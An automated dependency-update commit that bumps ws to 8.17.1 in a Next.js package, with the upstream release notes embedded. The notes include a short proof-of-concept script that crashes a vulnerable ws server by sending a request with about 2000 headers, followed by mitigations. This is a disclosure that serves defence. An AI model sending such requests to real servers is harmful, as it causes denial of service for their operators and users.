Update dependency ws to v8.17.1 (#1080)

renovate[bot] · web-flow · commit c540af893918 · 2024-06-17T02:00:54.000Z
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com) This PR contains the following updates: | Package | Change | Age | Adoption | Passing | Confidence | |---|---|---|---|---|---| | [ws](https://github.com/websockets/ws) | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.17.0/8.17.1) | [![age](https://developer.mend.io/api/mc/badges/age/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/ws/8.17.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ws/8.17.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | --- > [!WARNING] > Some dependencies could not be looked up. Check the Dependency Dashboard for more information. --- ### Release Notes <details> <summary>websockets/ws (ws)</summary> ### [`v8.17.1`](https://github.com/websockets/ws/releases/tag/8.17.1) [Compare Source](https://github.com/websockets/ws/compare/8.17.0...8.17.1) ### Bug fixes - Fixed a DoS vulnerability ([#&#8203;2231](https://github.com/websockets/ws/issues/2231)). A request with a number of headers exceeding the[`server.maxHeadersCount`][server.maxHeadersCount] threshold could be used to crash a ws server. ```js const http = require('http'); const WebSocket = require('ws'); const server = http.createServer(); const wss = new WebSocket.Server({ server }); server.listen(function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: server.address().port }); request.end(); }); ``` The vulnerability was reported by [Ryan LaPointe](https://github.com/rrlapointe) in [https://github.com/websockets/ws/issues/2230](https://github.com/websockets/ws/issues/2230). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so that no more headers than the `server.maxHeadersCount` limit can be sent. 2. Set `server.maxHeadersCount` to `0` so that no limit is applied. [`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize [`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener [`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/X-oss-byte/Canary-nextjs).
diff --git a/packages/next/package.json b/packages/next/package.json
@@ -289,7 +289,7 @@
     "webpack": "5.92.0",
     "webpack-sources1": "npm:webpack-sources@3.2.3",
     "webpack-sources3": "npm:webpack-sources@3.2.3",
-    "ws": "8.17.0"
+    "ws": "8.17.1"
   },
   "resolutions": {
     "browserslist": "4.23.1",
